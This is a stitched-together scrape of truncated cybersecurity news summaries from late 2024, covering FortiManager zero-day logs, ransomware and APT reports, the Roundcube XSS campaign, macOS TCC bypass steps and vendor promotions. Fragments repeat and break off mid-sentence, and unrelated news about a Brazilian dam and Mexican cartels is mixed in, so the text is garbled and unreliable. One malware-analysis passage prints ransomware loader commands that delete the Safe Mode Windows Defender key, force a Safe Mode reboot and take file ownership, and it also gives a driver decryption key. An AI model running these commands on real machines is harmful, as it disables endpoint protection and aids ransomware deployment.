(SOC), network operations center (NOC) related to security, and compliance strategy that enables the enterprise capabilities that are clearly aligned with business, technology, threat drivers, data privacy and regulations. "Autosummary:
Some of the vulnerabilities exploited by Akira affiliates are listed below - "Throughout 2024, Akira has targeted a significant number of victims, with a clear preference for organizations in the manufacturing and professional, scientific, and technical services sectors," Talos researchers James Nutland and Michael Szeliga said. "Autosummary:
Log entries will show that the threat actors issued API commands to add these unregistered "localhost" devices: type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded" Another log entry shared by Fortinet was used to edit device settings: type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 opera,on="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)" Fortinet says that rogue FortiGate devices were seen using the serial number FMG-VMTM23017412, which appears to be the format used by FortiGate-VM virtual machines. The flaw impacts FortiManager versions 7.6.0, 7.4.0 - 7.4.4 7.2.0 - 7.2.7, 7.0.0 - 7.0.12, 6.4.0 - 6.4.14, and 6.2.0 through 6.2.12.Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices. "We got breached on this one weeks before it hit "advance notifications" - 0-day I guess," reads a now-deleted comment on Reddit. "Autosummary:
There are three more days left in the competition and participants will try to exploit security issues found in fully patched SOHO devices, including printers, NAS systems, WiFi cameras, routers, smart speakers, mobile phones (Samsung Galaxy S24), for a portion of the $1 million pool prize. "Autosummary:
This view was reflected as a broad theme in the Permiso Security State of Identity Security Report (2024), which finds that despite growing levels of confidence in the ability to identify security risk, nearly half of organizations (45%) remain "concerned" or "extremely concerned" about their current tools being able to detect and protect against identity security attacks. Despite 86% of organizations stating that they can identify their riskiest identities (human and non-human), nearly half (45%) suffered an identity security incident in the last year, with impersonation attacks the leading threat vector -- revealing that social engineering-based attacks continue to be a pervasive threat to organizations. "Autosummary:
Assigned the CVE identifier CVE-2024-44068 (CVSS score of 8.1), it has been addressed as of October 7, 2024, with the South Korean electronics giant characterizing it as a "use-after-free in the mobile processor [that] leads to privilege escalation. "Autosummary:
U.S. CISA adds Microsoft SharePoint flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 23, 2024 October 23, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
It collected CPU, BIOS, and OS information, performed anti-VM and anti-debugging checks, and sent the information to Lazarus" command-and-control (C2) server. "Autosummary:
"Grandoreiro searches for anti-malware solutions such as AVAST, Bitdefender, Nod32, Kaspersky, McAfee, Windows Defender, Sophos, Virus Free, Adaware, Symantec, Tencent, Avira, ActiveScan, and CrowdStrike," the company said. "Autosummary:
The loader achieves this using a combination of Windows command line tools bcdedit, sc, and reg to: set Safe Mode as the default boot mode, disable Windows Defender in Safe Mode, create a service, irnagentd , that executes the loader after the system is rebooted into Safe Mode, and , that executes the loader after the system is rebooted into Safe Mode, and restart the system. There are four stages that the attacker distinguishes in their log messages – they use a different prefix for logging errors in each of them: [dec] – payload decryption, – payload decryption, [exec] – ransomware execution, – ransomware execution, [execk] – MS4Killer execution, and – MS4Killer execution, and [kler] – MS4Killer run (this prefix is used when MS4Killer exits unexpectedly).Decryption and dropping of vulnerable driver probmon.sys Driver loading is consistent with s4killer: enabling the SeLoadDriverPrivilege necessary for loading and unloading device drivers, creating a service via CreateServiceW , creating additional registry keys, required for filter loading, in HKLM\SYSTEM\ControlSet001\services\<service_name> , and loading a minifilter driver into the system via FilterLoad .N/A Subject C KR Valid from 2011-06-08 06:01:39 Valid to 2014-06-07 08:32:23 Additional MDeployer file paths C:\Windows\Debug\b.cache C:\Windows\Debug\a.cache C:\Windows\Debug\fail.txt C:\Windows\Debug\stop.exe Commands used by MDeployer reg delete HKLM\SYSTEM\CurrentControlSet\Control\Safeboot\Network\WinDefend /f C:\Windows\System32\cmd.exe /c takeown /R /A /F After that, it does a “Safe Mode cleanup” – it deletes the decrypted ransomware file pay.exe, creates the control flow file stop.exe to prevent double encryption, deletes the persistence service irnagentd, and reboots the system back into normal mode.{default} safeboot reg delete HKLM\SYSTEM\CurrentControlSet\Control\Safeboot\Network\WinDefend /f C:\Windows\System32\cmd.exe /c ping localhost -n 5 > nul & del C:\Windows\Debug\dtest.dll shutdown -r -f -t 00 C:\Windows\praxisbackup.exe C:\Windows\Debug\pay.exe MITRE ATT&CK techniques This table was built using version 15 of the MITRE ATT&CK framework.Attributes of the exploited driver probmon.sys String decryption MS4Killer uses encryption to hide embedded strings in the binary from plain sight: specifically, it XORs log message strings, the RC4 key used to decrypt the embedded driver, and the list of process names to terminate. In this particular case, MS4Killer abuses an older, vulnerable minifilter driver: probmon.sys, version 3.0.0.4 (Figure 7), signed by an already revoked certificate from ITM System Co.,LTD.Decryption of log message after OpenProcessToken API call Loading probmon.sys As mentioned previously, the legitimate vulnerable driver is embedded as an RC4-encrypted blob (using the key FGFOUDa87c21Vg+cxrr71boU6EG+QC1mwViTciNaTUBuW4gQbcKboN9THK4K35sL), which is also XOR encrypted, in the MS4Killer binary.Figure 11 shows a code snippet, where, in that particular case, only process names ERAAgent.exe and ekrn.exe, which are from ESET products, are compared against the running processes. Execution In all of the observed cases, the persistence of the loader was achieved by a scheduled task, Perf_sys (Figure 5), created by an already elevated system user BITCH\Administrator.[reg-del] – modifying Windows registry, and , – modifying Windows registry, and [setsb] – using the bcdedit.exe command line tool to set Safe Mode on next restart. During cleanup, the loader terminates the MS4Killer process, deletes the decrypted payloads and the vulnerable driver dropped by MS4Killer, and creates the flow control file stop.exe.[sc delete] – creating or deleting the service irnagentd , , – creating or deleting the service , [reg] ,Next, it does the same for the ransomware payload, which is decrypted from a.cache , saved as pay.exe , and executed. "Autosummary:
"Government information technology leaders find themselves at a challenging balance point: On one end of the scale are increasing threats from cyber actors, bolstered by advanced technology like artificial intelligence (AI); on the other end is a longstanding commitment to providing transparent services to residents via digital means, including access to public records, reports, meeting minutes, and more. Over a third (34%) of state and local governments were hit by ransomware this year, according to … More
The post IT security and government services: Balancing transparency and security appeared first on Help Net Security.
"Autosummary:
Government information technology leaders find themselves at a challenging balance point: On one end of the scale are increasing threats from cyber actors, bolstered by advanced technology like artificial intelligence (AI); on the other end is a longstanding commitment to providing transparent services to residents via digital means, including access to public records, reports, meeting minutes, and more. State and local governments will continue to grapple with rising cyberattacks, but with the right strategy, government IT leaders can defend their assets, while still retaining transparent, frictionless services to residents. "Phishing scams aimed at voters, malicious domain registrations impersonating candidates, and other threat activity designed to exploit unassuming victims take center stage as the US election approaches, according to Fortinet. “As the 2024 US presidential election approaches, it’s critical to recognize and understand the cyberthreats that may impact the integrity and trustworthiness of the election process and the welfare of the participating citizens. Cyber adversaries, including state-sponsored actors and hacktivist groups, are increasingly active leading … More
The post Phishing scams and malicious domains take center stage as the US election approaches appeared first on Help Net Security.
"Autosummary:
The analysis continues to show a significant number of diverse databases available on darknet forums targeting the US, including SSNs, usernames, email addresses, passwords, credit card data, date of birth, and other PII that could be used to challenge the integrity of the 2024 US election. "In this Help Net Security interview, Dr Kathryn Jones, Head of School, Computer Science and Informatics at Cardiff University, discusses the challenges and misconceptions that deter women from pursuing careers in cybersecurity. Dr Jones also outlines the diverse skills, mentorship, and outreach programs that empower women to thrive in cybersecurity careers. What are some common misconceptions or biases that may deter women from pursuing a career in cybersecurity? One misconception is the stereotype of a … More
The post Myths holding women back from cybersecurity careers appeared first on Help Net Security.
"Autosummary:
At Cardiff School of Computer Science and Informatics, our Director of Teaching, Elaine Haigh, and Dr Yulia Cherdantseva, director or our Academic Centre of Excellence in Cyber Security Education, are both strong leaders with expertise in cybersecurity and play a significant role leading and enhancing our educational offering.Additionally, our Cyber Innovation Hub, led by Professor Pete Burnap, plays a vital role in providing opportunities for individuals to upskill, incubate, and grow start-up ideas.In Wales, for example, the Women in Cyber group offers a well-established community where women can meet regularly to share experiences, discuss challenges, and find support. "Autosummary:
"Autosummary:
" Earlier this month, CISA added another critical flaw impacting Fortinet FortiOS, FortiPAM, FortiProxy, and FortiWeb (CVE-2024-23113, CVSS score: 9.8) to its KEV catalog, based on evidence of in-the-wild exploitation. "Broadcom has released new patches for previously fixed vulnerabilities (CVE-2024-38812, CVE-2024-38813) in vCenter Server, one of which hasn’t been fully addressed the first time and could allow attackers to achieve remote code execution. The vulnerabilities were privately reported by zbl & srs of team TZL – researchers who participated in the 2024 Matrix Cup in June 2024. Broadcom maintains that they are not currently aware of exploitation “in the wild.” CVE-2024-38812 and CVE-2024-38813 VMware vCenter … More
The post VMware fixes critical vCenter Server RCE bug – again! (CVE-2024-38812) appeared first on Help Net Security.
"Autosummary:
Apply the new patches Aside from completing the fix for CVE-2024-38812, the new updates resolve an operational issue created by the fist patch: session timeouts when accessing vCenter. "The convergence of IT and operational technology (OT) and the digital transformation of OT have created new opportunities for innovation and efficiency in critical Industrial Automation and Control Systems. However, these advancements also broaden the potential attack surface, making it even more crucial to improve and extend security for OT environments. Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by … More
The post Palo Alto Networks extends security into harsh industrial environments appeared first on Help Net Security.
"Autosummary:
Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by Precision AI, the Prisma Access Browser with Privileged Remote Access and a suite of ruggedized, ML-powered Next-Generation Firewalls (NGFWs) built to withstand harsh industrial settings where traditional firewalls often cannot operate. "Attackers have exploited an XSS vulnerability (CVE-2024-37383) in the Roundcube Webmail client to target a governmental organization of a CIS country, Positive Technologies (PT) analysts have discovered. The vulnerability was patched in May 2024, in Roundcube Webmail versions 1.5.7 and 1.6.7. The email carrying the exploit was sent in June 2024. About CVE-2024-37383 Roundcube is an open-source, browser-based IMAP client with a user interface that makes it look like a standalone application. CVE-2024-37383 is a … More
The post Roundcube XSS flaw exploited to steal credentials, email (CVE-2024-37383) appeared first on Help Net Security.
"Autosummary:
The email body actually contains hidden JavaScript code, which downloads Road map.doc to serve as a decoy, while in the background it: Tries to grab messages from the mail server using the ManageSieve plugin Adds an authorization form to the HTML page displayed to the user, with the hope that the target’s login and password for the Roundcube client will either be autofilled or entered by the target. "Autosummary:
In May 2024, a coalition of European countries said it dismantled over 100 servers linked to several malware strains such as IcedID (and, by extension, Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot. "Autosummary:
"Autosummary:
In addition, with the cooperation of the aforementioned authorities, there have also been police actions in Ukraine, Switzerland, Armenia, Portugal, Romania, Canada, Lithuania and Bulgaria for the arrest or interrogation of suspects, searches or the seizure and downing of servers. "Autosummary:
U.S. CISA adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 22, 2024 October 22, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
" In mid-June, Kupchik resubmitted the report with a better proof-of-concept (PoC) and explanation, which led to Microsoft confirming the vulnerability on July 8. "Autosummary:
The JavaScript is executed using a legitimate Windows binary named "cscript.exe." "The PowerShell loader script masquerading as the INI file contains base64 encoded data blob of the payload PowerRAT, which decodes and executes in the victim"s machine memory," Raghuprasad said. "Autosummary:
Samsung zero-day flaw actively exploited in the wild Pierluigi Paganini October 22, 2024 October 22, 2024 Google’s Threat Analysis Group (TAG) researchers warn of a Samsung zero-day vulnerability that is exploited in the wild. "Autosummary:
Windows 10 KB5045594 cumulative update Source: BleepingComputer As this is an optional update, you will be asked whether you wish to install it by clicking the "Download and install" link, as shown in the image below. What"s new in Windows 10 KB5045594 With this update, Microsoft has introduced eight fixes and one new feature, which are listed below: [Start menu] New! Fixed: When you use a USB cable to connect to a Multi-Function Printer (MFP), it prints specific network command text when you do want it to. Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." "A recent Todyl report revealed a 558% increase in BEC (Business Email Compromise), AiTM (Adversary-in-the-Middle), and ATO (Account Takeover) attacks in 2024. In this Help Net Security video, David Langlands, Chief Security Officer at Todyl, discusses these evolving cyber threats. Here are the key findings from the report: BEC is evolving as attackers shift from traditional malware to exploiting human error and vulnerable communication channels. Attackers are exploiting gaps in security like the lack of … More
The post Evolving cybercriminal tactics targeting SMBs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
“Some processes are taking longer than expected, because it is quite complex, but for the families that chose quickly to have their houses built here, their houses are ready, and they have already moved in.”Marcos Muniz, known as Marquinhos, moved to one of the towns that was hit - Bento Rodrigues - in 1969, when he was six years old, to the same house where his father was born.A separate trial against Samarco’s second parent company, Brazilian mining company Vale, is taking place in the Netherlands, with about 70,000 plaintiffs. "Cybersecurity troubles are not over for the Internet Archive (IA), the nonprofit organization behind the popular digital library site: after the recent DDoS attacks, defacement and data breach, an email sent via its Zendesk customer service platform has shown that some of its IT assets remain compromised. The initial attacks Two weeks ago, the Internet Archive was made inaccessible by several DDoS attacks claimed by pro-Palestinian hacktivists. In the days before the first one, a … More
The post The Internet Archive breach continues appeared first on Help Net Security.
"Autosummary:
A new development On Friday, October 18, IA’s founder Brewster Kahle said that the stored data of the Internet Archive is safe, and that “the Wayback Machine, Archive-It, scanning, and national library crawls have resumed, as well as email, blog, helpdesk, and social media communications.” "Autosummary:
Today, on the Lock and Code podcast with host David Ruiz, we speak with Cody Venzke, senior policy counsel with the ACLU, about how data brokers collect their information, what data points are off-limits (if any), and how people can protect their sensitive information, along with the harms that come from unchecked data broker activity—beyond just targeted advertising. "In the last couple of days, Fortinet has released critical security updates for FortiManager, to fix a critical vulnerability that is reportedly being exploited by Chinese threat actors. Security updates are trickling out The company, which is known for pushing out fixes for critical vulnerabilities before disclosing their existence to the public, has privately notified select customers a week ago and shared temporary mitigation advice. The advice apparently includes configuring FortiManager to prevent devices with … More
The post Fortinet releases patches for undisclosed critical FortiManager vulnerability appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords, and secrets from the LSASS process," Ido Naor, co-founder and CEO of Israeli cybersecurity company Security Joes, said in a statement shared with The Hacker News. "Autosummary:
" ️Trending CVEs CVE-2024-38178, CVE-2024-9486, CVE-2024-44133, CVE-2024-9487, CVE-2024-28987, CVE-2024-8963, CVE-2024-40711, CVE-2024-30088, CVE-2024-9164 🔔 Top News Apple macOS Flaw Bypasses Privacy Controls in Safari Browser: Microsoft has disclosed details about a now-patched security flaw in Apple"s Transparency, Consent, and Control (TCC) framework in macOS that could be abused to get around a user"s privacy preferences and access data. Cybersecurity Resources & Insights LIVE Webinars The exact steps that transformed their data security overnight Insider tricks to implement DSPM with minimal disruption The roadmap that slashed security incidents by 70% Join Ian Ahl, Mandiant"s former threat-hunting mastermind, as he: Decrypts LUCR-3"s shadowy tactics that breach 9 out of 10 targets Unveils the Achilles" heel in your cloud defenses you never knew existed Arms you with the counterpunch that leaves LUCR-3 reeling This isn"t a webinar.87,000+ Internet-Facing Fortinet Devices Vulnerable to CVE-2024-23113: About 87,390 Fortinet IP addresses are still likely susceptible to a critical code execution flaw (CVE-2024-23113, CVSS score: 9.8), which was recently added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalog. About 87,390 Fortinet IP addresses are still likely susceptible to a critical code execution flaw (CVE-2024-23113, CVSS score: 9.8), which was recently added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalog.Google Outlines Two-Pronged Approach to Tackle Memory Safety Challenges: Google said it"s migrating to memory-safe languages such as Rust, Kotlin, Go, as well as exploring interoperability with C++ through Carbon, to ensure a seamless transition. "Autosummary:
Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign Pierluigi Paganini October 21, 2024 October 21, 2024 Hackers exploited a now-patched Roundcube flaw in a phishing attack to steal user credentials from the open-source webmail software. "Autosummary:
In May, an international law enforcement operation codenamed "Operation Endgame" seized over a hundred servers supporting the multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. "Autosummary:
IntelBroker claimed to have gained access to Github projects, Gitlab Projects, SonarQube projects, Source code, hard coded credentials, Certificates, Customer SRCs, Cisco Confidential Documents, Jira tickets, API tokens, AWS Private buckets, Cisco Technology SRCs, Docker Builds, Azure Storage buckets, Private & Public keys, SSL Certificates, Cisco Premium Products, and other info. "Autosummary:
"An authorization form with the fields rcmloginuser and rcmloginpwd (the user"s login and password for the Roundcube client) is added to the HTML page displayed to the user" - Positive Technologies According to the researchers, the threat actor expects the two field to be filled, manually or automatically, and thus obtain the target"s account credentials. "Autosummary:
Then they may do one of several things: Sell your Google Voice number and account to other scammers Place vishing calls designed to scam victims, using your Google Voice account Embed your Google Voice number into email phishing or smishing messages Use the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scams Use the Google Voice number and spoofing software to call or text your family and friends, asking for emergency funds The FTC also warns that sometimes the fraudster will try to obtain personally identifiable information from you as well as carry out the Google Voice scam.Watch out for schemes where fraudsters trick people into sharing verification codes so they can gain access to their phone numbers In our hyper-connected world, technology has transformed the way we communicate, enabling us to connect with anyone, anywhere, at the touch of a button. What to do in a worst-case scenario If you realize you’ve been the victim of a Google Voice scam, there’s a dedicated page designed to help you reclaim your Voice number. "Autosummary:
" The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim"s web browser. "Autosummary:
"Autosummary:
F5 fixed a high-severity elevation of privilege vulnerability in BIG-IP Pierluigi Paganini October 20, 2024 October 20, 2024 Technology firm F5 patches a high-severity elevation of privilege vulnerability in BIG-IP and a medium-severity flaw in BIG-IQ. "Autosummary:
"Autosummary:
"Autosummary:
The most severe flaw included in the September 2024 security bulletin is the critical, remote code execution (RCE) vulnerability CVE-2024-40711 (CVSS v3.1 score: 9.8) impacting Veeam Backup & Replication (VBR).U.S. CISA adds Veeam Backup and Replication flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 19, 2024 October 19, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Veeam Backup and Replication vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
A North Korea-linked threat actor, tracked as APT37 (also known as RedEyes, TA-RedAnt, Reaper, ScarCruft, Group123), exploited a recent Internet Explorer zero-day vulnerability, tracked as CVE-2024-38178 (CVSS score 7.5), in a supply chain attack.North Korea-linked APT37 exploited IE zero-day in a recent attack Pierluigi Paganini October 19, 2024 October 19, 2024 North Korea-linked group APT37 exploited an Internet Explorer zero-day vulnerability in a supply chain attack. "Autosummary:
The data breach at Omni Family Health may have exposed varying personal information for current and former patients, including names, addresses, Social Security numbers, dates of birth, health insurance details, and medical information. "Attackers have tried to deliver wiper malware to employees at organizations across Israel by impersonating cybersecurity company ESET via email. The phishing email The attack took the form of a phishing email ostensibly sent by the “Eset Advanced Threat Defense Team”, warning that state-backed hackers have tried compromising the target’s device(s). The phishing email (Source: A user of the ESET Security Forum) The email was posted on ESET Security Forum’s on October 8 by a … More
The post Israeli orgs targeted with wiper malware via ESET-branded emails appeared first on Help Net Security.
"Autosummary:
The phishing email The attack took the form of a phishing email ostensibly sent by the “Eset Advanced Threat Defense Team”, warning that state-backed hackers have tried compromising the target’s device(s). "Autosummary:
The HM Surf exploit devised by Microsoft hinges on performing the following steps - Changing the home directory of the current user with the dscl utility, a step that does not require TCC access in macOS Sonoma Modifying the sensitive files (e.g., PerSitePreferences.db) within "~/Library/Safari" under the user"s real home directory Changing the home directory back to the original directory causes Safari to use the modified files Launching Safari to open a web page that takes a snapshot via the device"s camera and grab the location The attack could be extended further to save an entire camera stream or stealthily capture audio through the Mac"s microphone, Microsoft said. "Autosummary:
The attacks have targeted healthcare, government, information technology, engineering, and energy sectors, per the Australian Federal Police (AFP), the Australian Signals Directorate"s Australian Cyber Security Centre (ACSC), the Communications Security Establishment Canada (CSE), the U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA). "Autosummary:
The investigation also revealed that the attackers stole 50,694 files, including the following: Internal documents Letters from business partners Documents related to green procurement Labor safety and health policies (business and supply chain, etc.) "Autosummary:
The vulnerabilities impact Intel"s 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD"s Zen 1, Zen 1+, and Zen 2 processors. "Autosummary:
Long-Term Impact and Cynet’s Role Beyond Funding As a leading provider of cybersecurity solutions with extensive experience in K-12 education, schools, universities, and libraries, Cynet Security is committed to building a resilient digital infrastructure for the entire education sector. With Cynet, schools strengthen their cybersecurity posture, improve their chances of receiving funding, and ensure they’re equipped to combat an ever-evolving threat landscape. "Autosummary:
The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later). "Autosummary:
"Autosummary:
Data published by the opposition suggests its candidate, Edmundo González, was the true winner, and international observers said that the election was seriously flawed. "In this Help Net Security interview, Mick Baccio, Global Security Advisor at Splunk SURGe, discusses the far-reaching implications of the NIS2 Directive beyond traditional IT security. He explains how NIS2 will fundamentally change cybersecurity governance, making it a core aspect of organizational strategy and accountability. Many experts suggest that the NIS2 Directive has far-reaching implications beyond IT security. Could you expand on the specific non-technical requirements that companies must be aware of? The NIS2 Directive … More
The post How NIS2 will impact sectors from healthcare to energy appeared first on Help Net Security.
"Autosummary:
The NIS2 Directive significantly broadens its scope compared to NIS1, now encompassing critical sectors such as telecommunications, food production, waste management, energy, healthcare, and chemical manufacturing.Moreover, as not all services benefit from a one-stop shop jurisdiction regime, some entities will face up to 27 distinct registration, auditing, and enforcement regimes. "Cyber-physical devices are increasingly getting compromised and leveraged by criminal groups and state-sponsored threat actors. Fyodor Yarochkin, Senior Threat Solution Architect with Trend Micro, believes that getting a better understanding of attackers’ infrastructure leads to a better understanding of the attackers themselves. (The answers have been lightly edited for clarity.) In your talk at Deep Conference next week, you will be talking about cyber-physical devices being compromised and used by cyber criminals and state-sponsored threat … More
The post The role of compromised cyber-physical devices in modern cyberattacks appeared first on Help Net Security.
"Autosummary:
We don’t see so much DDoS, but we see a lot of other unwanted actions, such as web scraping, credential spraying, cryptocurrency pump-and-dump campaigns, scraping of online shops, sneaker bot activity, online ticket speculation, carding (to match geolocation to the card owner location), and so on. Recent botnet disruptions by law enforcement have revealed that botnet operators are currently favoring the 3-Tier architecture: compromised (IoT, server, endpoint) devices make Tier 1, Tier 2 are servers forwarding communications between those devices and the servers issuing orders (Tier 3). Devices that interconnect the physical world give attackers a unique perspective: they allow them to perform on-ground observation of events, to monitor and observe the impact of their attacks, and can even sometimes make an impact on the physical world (although this would normally require them to be connect to some sort of SCADA/ICS equipment). "Cognizant announced the debut of Cognizant Neuro Cybersecurity, a new addition to Cognizant’s Neuro suite of platforms, designed to amplify cybersecurity resilience by integrating and orchestrating point cybersecurity solutions across the enterprise. Sophisticated threat actors, hybrid workforces, and the complexity of managing multiple security tools all weigh on an enterprise’s ability to manage cybersecurity risks. Traditional siloed technology and operations often lack the ability to deliver the insights that enable rapid decisions to preserve security … More
The post Cognizant Neuro Cybersecurity enhances threat detection and response appeared first on Help Net Security.
"Autosummary:
“As cybersecurity challenges become increasingly sophisticated and threats more acute, enterprises must adapt continually to remain a step ahead of threat actors,” said Annadurai Elango, EVP and Global Head, Core Technologies and Insights, Cognizant. "Autosummary:
" The development comes as Microsoft released server-side patches three Critical-rated flaws Dataverse, Imagine Cup, and Power Platform that could lead to privilege escalation and information disclosure - CVE-2024-38139 (CVSS score: 8.7) - Improper authentication in Microsoft Dataverse allows an authorized attacker to elevate privileges over a network (CVSS score: 8.7) - Improper authentication in Microsoft Dataverse allows an authorized attacker to elevate privileges over a network CVE-2024-38204 (CVSS score: 7.5) - Improper Access Control in Imagine Cup allows an authorized attacker to elevate privileges over a network (CVSS score: 7.5) - Improper Access Control in Imagine Cup allows an authorized attacker to elevate privileges over a network CVE-2024-38190 (CVSS score: 8.6) - "Autosummary:
García Luna, of course, was found to have been well-remunerated with millions in drug money by the notorious kingpin, Joaquín "El Chapo" Guzmán, for his services. “It’s worth asking whether these big cases have any real preventative effect,” says Deborah Bonello, an investigative journalist and the author of Narcas, which is about women in organised crime. During the arrest earlier this year of one of the co-founders of the Sinaloa Cartel, Ismael "El Mayo" Zambada, the Americans essentially acted alone and didn’t share any intelligence information with their Mexican counterparts ahead of time, points out Ms Bonello. "Autosummary:
"Autosummary:
Full names Social Security numbers Addresses Dates of birth Driver"s license numbers Medical record numbers Health insurance information Billing information Treatment information (limited) BHCP clarifies that the cyberattack did not impact its electronic medical record systems, as they are hosted on a separate network. "Autosummary:
The 114-page Microsoft Digital Defense Report (MMDR) looks at multiple aspects of the cybersecurity landscape, including AI security, denial-of-service attacks, phishing, social engineering, and nation-state threats. "Autosummary:
"Autosummary:
"Autosummary:
Cisco Talos researchers observed Russia-linked threat actor RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) targeting Ukrainian government agencies and Polish entities in a new wave of attacks since at least late 2023. "Application Security Engineer Cognism | France | Hybrid – View job details As an Application Security Engineer, you will conduct in-depth security assessments of web applications, identifying vulnerabilities using automated tools (e.g., SAST, DAST) and manual techniques. You will analyze source code for security vulnerabilities, focusing on secure coding practices, and provide feedback to developers on mitigating risks. Additionally, you will work with DevOps teams to integrate security testing tools and processes into CI/CD pipelines, … More
The post Cybersecurity jobs available right now: October 16, 2024 appeared first on Help Net Security.
"Autosummary:
Penetration Tester Ekco | Ireland | Hybrid – View job details As a Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks. Lead Detection Engineer UKG | Ireland | Hybrid – View job details As a Lead Detection Engineer, you will be providing hands-on solutions, customization and tuning, automation, dashboards, and use case development for the SIEM, SOAR, and other stakeholder requirements for threat informed defense strategies. Senior Governance Risk and Compliance Specialist Nippon Gases | Italia | Hybrid – View job details As a Senior Governance Risk and Compliance Specialist, you will develop, enhance, operationalize enterprise-level security, risk policies, processes, and controls to mitigate risk and comply with applicable laws and regulations. Cyber Security Engineer DS Smith | United Kingdom | Hybrid – View job details As a Cyber Security Engineer, you will be a member of team of a global network of security specialists supporting business facing operations, ICS/OT, IT, and the digital security function, with a focus on mitigating and reducing the threat levels within the business related to digital services. "Autosummary:
"Autosummary:
"Autosummary:
Version number should be 13.5.7 or higher The vulnerability, tracked as CVE-2024-9680, allows attackers to execute malicious code within the browser’s content process, which is the environment where it loads and renders web content. "A new report from Mandiant reveals that the average time-to-exploit vulnerabilities before or after a patch is released has plunged to just five days in 2023, down from 32 days in 2021 in 2022. One reason for this is the fact that, in 2023, exploitation of zero-day vulnerabilities (unknown to vendors, with no patches available) considerably outpaced the exploitation of n-day flaws (publicly disclosed bugs, with patches available). Another is that n-day exploitation continues to … More
The post Defenders must adapt to shrinking exploitation timelines appeared first on Help Net Security.
"Autosummary:
The analysts pointed out that, for example, CVE-2023-28121, an improper authentication vulnerability affecting the WooCommerce Payments plugin for WordPress, was exploited quickly after an exploit was available, while CVE-2023-27997, a heap-based buffer overflow in the SSL/VPN component of Fortinet FortiOS, took much longer despite immediate public attention and exploit releases. "Autosummary:
There are six key LLM (Large Language Model) components that can be targeted by attackers: Prompt - Attacks like prompt injections, where malicious input is used to manipulate the AI"s output Response - Misuse or leakage of sensitive information in AI-generated responses Model - Theft, poisoning, or manipulation of the AI model Training Data - Introducing malicious data to alter the behavior of the AI. Using AI to Abuse AI: Introducing GPTs GPTs, introduced by OpenAI on November 6, 2023, are customizable versions of ChatGPT that allow users to add specific instructions, integrate external APIs and incorporate unique knowledge sources. OpenAI protection AI Attacks and Risks There are multiple frameworks existing today to assist organizations that are considering developing and creating AI-based software: NIST Artificial Intelligence Risk Management Framework Google"s Secure AI Framework OWASP Top 10 for LLM OWASP Top 10 for LLM Applications The recently launched MITRE ATLAS LLM Attack Surface "Autosummary:
" The latest version of RokRAT is capable of enumerating files, terminating arbitrary processes, receiving and executing commands received from a remote server, and gathering data from various applications such as KakaoTalk, WeChat, and browsers like Chrome, Edge, Opera, Naver Wales, and Firefox. "Autosummary:
ScarCruft (aka "APT37" or "RedEyes") is a state-sponsored cyber-espionage threat actor known for targeting systems in South Korea and Europe, as well as North Korean human rights activists and defectors, using phishing, watering hole, and Internet Explorer zero-days. "Autosummary:
"Autosummary:
SolarWinds Web Help Desk is an IT help desk suite used by 300,000 customers worldwide, including government agencies, large corporations, and healthcare organizations. "Autosummary:
From 2020 until 2022, the ratio between n-days (fixed flaws) and zero-days (no fix available) remained relatively steady at 4:6, but in 2023, the ratio shifted to 3:7. "Autosummary:
Among them, it was possible to identify tax registration, email addresses, registered domains, IP addresses, social media accounts, telephone number and city . "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-30088 (CVSS score 7.0) Microsoft Windows Kernel TOCTOU Race Condition Vulnerability CVE-2024-9680 Mozilla Firefox Use-After-Free Vulnerability CVE-2024-28987 (CVSS score 9.1) "Autosummary:
